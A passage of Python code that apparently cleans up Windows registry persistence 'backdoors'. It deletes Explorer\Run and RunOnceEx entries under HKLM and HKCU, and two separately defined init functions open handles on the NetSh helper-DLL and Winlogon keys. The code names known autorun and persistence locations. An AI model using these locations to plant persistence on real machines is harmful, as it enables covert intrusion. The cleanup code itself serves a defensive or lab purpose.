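    _clear_system_delete_key(hklm, base + r"\Policies\Explorer\Run", 'Explorer\\Run',
                             missing_msg='没有植入HKLM Explorer\\Run 后门')
    _clear_system_delete_key(hklm, base + r"\RunOnceEx\0001", 'RunOnceEx\\0001',
                             missing_msg='没有植入 RunOnceEx\\0001 后门', sub_key='Depend')
    _clear_system_delete_key(hkcu, base + r"\Policies\Explorer\Run", 'Explorer\\Run',
                             missing_msg='没有植入HKCU Explorer\\Run 后门')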
def init():
    """Return a RegEdit handle on ``HKLM\\SOFTWARE\\Microsoft\\NetSh``.

    Only opens the handle; nothing is read or written.  (Values under this
    key name the helper DLLs ``netsh`` loads, so it is a known audit point.)
    """
    return pyregedit.RegEdit(pyregedit.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\NetSh")
def init():
    """Return a RegEdit handle on the per-user ``Winlogon`` key under HKCU.

    Only opens the handle; nothing is read or written here.
    """
    return pyregedit.RegEdit(
        pyregedit.HKEY_CURRENT_USER,
        r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
    )